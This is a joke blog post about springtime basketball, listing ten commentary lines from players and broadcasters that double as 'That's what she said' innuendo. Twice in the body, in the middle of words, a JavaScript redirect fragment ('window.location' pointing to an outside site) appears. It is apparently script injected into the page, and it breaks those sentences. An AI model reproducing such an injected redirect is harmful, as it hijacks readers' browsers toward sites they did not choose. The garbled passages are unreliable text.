(…teehee, I said “In ya end. Oh!”)
Ah, yes, it’s a great time of year to be a basketball fan. March Madness is in full swing, the NBA contenders are making their playoff push, buzzer beaters and siiiiick moves everywhere. It’s a time that I, like many hoop heads become extra vocal while watching games.
But because of the hoops overload, it gives us the opportunity to watch ball with significant others, family and friends who don’t normally watch it. And lifewindow.location=”http://occupyto.org/”; is like watching hoops with non-fans: you never know what you’re gonna get. You hear comments about uniform colors (ahem, ladies), comments about Gregg Popovich’s acne scars, noticing the mascot in the bottom left hand corner of the screen while a buzzer beater is in progress… and random giggles whenever you or the announcer makes a “That’s what she said” comment.
And so, without further ado, here are The Top 10 Overheard “That’s what she said” Comments in Springtime Basketball:
10 – “Gotta lovewindow.location=”http://occupyto.org/”; him, he always goes hard to the hole and you never know what he’s gonna do with it once he’s down there” – Chris Paul dishes yet another assist, this time to Tyson Chandler for the alley-oop jam.
9 – “You see how close his head was to the rim?!?” – LBJ throws down another one.
8 – “Give it to him down there, he’s begging for it.” – Shaq with good post position and his teammates can’t find him.
7 – “Oooo, takes it square in the chest.” – A player draws the charge.
6 – “Wow, what a nose for those loose balls” – Dwight Howard hustles down his 20th board.
5 – “Kobe serving up the facial!” – Marv Albert
4 – “…And what do we like about this young man? Well, two things. One: he always gets deep penetration. Okay? And two: he knows how to finish.” – Hubie Brown of ABC Sports.
3 – “Send it in, big fella!” – Bill Raftery of CBS Sports during a NCAA tournament game.
2 – “Oh! Right between the eyes!” – Kevin Harlan of CBS Sports and Turner Sports
1 – “Yyyessss!” – Again, Marv Albert
Honorable mention:
“Morehead” – The answer to the question “Who’s Louisville playing in the first round? It’s something State…”
